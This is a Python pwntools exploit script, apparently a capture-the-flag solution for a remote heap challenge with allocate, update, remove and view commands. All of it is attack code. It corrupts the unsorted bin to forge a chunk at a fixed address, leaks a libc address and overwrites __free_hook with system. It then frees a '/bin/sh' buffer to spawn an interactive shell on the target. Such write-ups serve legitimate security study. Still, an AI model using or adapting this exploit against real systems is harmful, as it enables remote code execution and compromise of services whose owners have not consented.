#!/usr/bin/env python # -*- coding: utf-8 -*- from pwn import * from hashlib import * #host = "" #port = 8888 host = "" port = 5655 r = remote(host,port) def allocate(size): r.recvuntil("Command:") r.sendline("1") r.recvuntil(":") r.sendline(str(size)) def update(idx,size,data): r.recvuntil("Command:") r.sendline("2") r.recvuntil(":") r.sendline(str(idx)) r.recvuntil(":") r.sendline(str(size)) r.recvuntil(":") r.sendline(data) def remove(idx): r.recvuntil("Command:") r.sendline("3") r.recvuntil(":") r.sendline(str(idx)) def view(idx): r.recvuntil("Command:") r.sendline("4") r.recvuntil(":") r.sendline(str(idx)) def proof_of_work(chal): gg = ''.join(chr(i) for i in range(256)) while True: sol = ''.join(random.choice(gg) for _ in xrange(4)) if sha256(chal + sol).digest().startswith('\0\0\0'): return sol r.send(proof_of_work(r.recvline().strip())) allocate(0x400) #0 allocate(0x20) #1 allocate(0x400) #2 allocate(0x88) #3 allocate(0xfe0) #4 allocate(0x80) #5 update(4,0xf20,"\x00"*0xef0 + p64(0xf00)+p64(0x21)+ p64(0)*2 + p64(0) +p64(0x21) ) remove(4) update(3,0x88-12,"a"*(0x88-12)) allocate(0x80) #4 allocate(0x20) #6 allocate(0x400) #7 allocate(0x20) #8 allocate(0x400) #9 allocate(0x20) #10 remove(4) remove(5) remove(7) remove(9) allocate(1156) # 4 allocate(0x410) #5 remove(0) update(5,0xe0,"\x00"*0xb0 + p64(0) + p64(0x402) + p64(0x133707d0-0x15)*4) # prepare size 0x56 for fake chunk allocate(20) #0 remove(2) update(5,0xe0,"\x00"*0xb0 + p64(0) + p64(0x402) + p64(0x133707d0)*4) # create bk for unsorted bin allocate(20) #2 allocate(0xe0) #7 allocate(0xa50)#9 update(9,0x9f0,"\x00"*0x9e0 + p64(0) + p64(0xf1)) fake_chunk = 0x133707c8 remove(7) update(9,0xa00,"\x00"*0x9a0 + p64(0) + p64(0xb1) + p64(0)*2 + p64(0) + p64(0x21) + p64(0)*2 + p64(0) + p64(0xf1) + p64(0) + p64(fake_chunk)) remove(0) allocate(72) #0 unsorted bin corruped to get the fake_chunk allocate(0xe0) #7 update(0,24, p64(0x91) + p64(0) + p64(0x13370000)) update(7,16,p64(0) + p64(0x133707d0)) allocate(0x80) #11 update(11,96,p64(0)*6 + p64(0) + p64(0x13377331) + p64(0x13370010)+p64(0x30) + p64(0x13370820) + p64(0x100)) view(0) r.recvuntil("Chunk[0]: ") data = r.recvuntil("1.") #libc = u64(data[0:8]) - 0x3c1b58 libc = u64(data[0:8]) - 0x399b58 print hex(libc) #free_hook = libc + 0x3c3788 free_hook = libc + 0x39b788 #system = libc + 0x456a0 system = libc + 0x3f480 update(1,40,p64(free_hook) + p64(0x30) + p64(0x13370840) + p64(0x30) + "/bin/sh\x00") update(0,8,p64(system)) remove(1) r.interactive()